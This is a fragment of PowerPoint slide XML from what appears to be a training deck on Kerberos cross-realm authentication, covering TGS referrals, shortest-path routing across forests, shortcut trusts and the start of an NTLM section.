              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3407229" h="827314">
                <a:moveTo>
                  <a:pt x="0" y="827314"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1093107" y="809171"/>
                  <a:pt x="2186215" y="791028"/>
                  <a:pt x="2754086" y="653142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3321958" y="515256"/>
                  <a:pt x="3364593" y="257628"/>
                  <a:pt x="3407229" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:headEnd type="oval" w="lg" len="lg"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>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222799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Three-Realm Referral Example</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo: Getting an analyzing a network trace of a resource access in another forest</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication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909343"/>
            <a:ext cx="5980970" cy="1132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285" y="2564904"/>
            <a:ext cx="4057315" cy="285608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>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6021" y="2912229"/>
            <a:ext cx="3679304" cy="856824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>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286" y="3836154"/>
            <a:ext cx="3536500" cy="302409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>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8397" y="4198104"/>
            <a:ext cx="3721306" cy="840024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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5285" y="5102979"/>
            <a:ext cx="4040515" cy="285608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032"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76625" y="5455405"/>
            <a:ext cx="4191719" cy="848424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2406606206"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2076450" y="3189288"/>
          <a:ext cx="895350" cy="192087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId10" imgW="895320" imgH="192600" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId10" imgW="895320" imgH="192600" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="5" name="Object 4"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId11"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="-2076450" y="3189288"/>
                        <a:ext cx="895350" cy="192087"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402603" y="2564904"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3023339" y="2900561"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>59</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402603" y="3836154"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2975714" y="4198104"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>70</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413119" y="5102979"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2953943" y="5455404"/>
            <a:ext cx="470590" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>83</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76783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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1030"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1031"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103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nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1032"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50"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17" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="1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More realms and Shortcut Trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1569660"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Access from it.west.tailspintoys.com to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>it.east.tailspintoys.coms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The local TGS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>calculates the shortest path to the target domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sends a TGS referral for the nearest trusted realm along the shortest path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without shortcut trusts, a request travel goes on...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1475656" y="3429000"/>
            <a:ext cx="5695950" cy="2286000"/>
            <a:chOff x="1475656" y="3573016"/>
            <a:chExt cx="5695950" cy="2286000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Picture 2" descr="Forest Configu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3573016"/>
              <a:ext cx="5695950" cy="2286000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="正方形/長方形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2954638" y="5028289"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="正方形/長方形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3716638" y="4487416"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="正方形/長方形 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4356806" y="3854956"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="正方形/長方形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5280259" y="4479943"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="正方形/長方形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627566" y="4761883"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191131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More realms and Shortcut Trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1477328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>The same scenario again but with two shortcut trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>A travel to get a correct TGT shortens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The shortest-path algorithm can only make use of trusts that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>at or above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the current position</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shortcut Trust 2 is not used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1386514" y="3442376"/>
            <a:ext cx="6010275" cy="2771775"/>
            <a:chOff x="1619672" y="3212976"/>
            <a:chExt cx="6010275" cy="2771775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Picture 2" descr="Forest Configuration with Shortcut Trus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3212976"/>
              <a:ext cx="6010275" cy="2771775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="正方形/長方形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2550014" y="4805794"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="正方形/長方形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3205334" y="4240723"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="正方形/長方形 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4957934" y="3844483"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="正方形/長方形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6382874" y="4672444"/>
              <a:ext cx="241143" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="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4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308598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dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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9293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320165"/>
            <a:ext cx="7924800" cy="2923877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
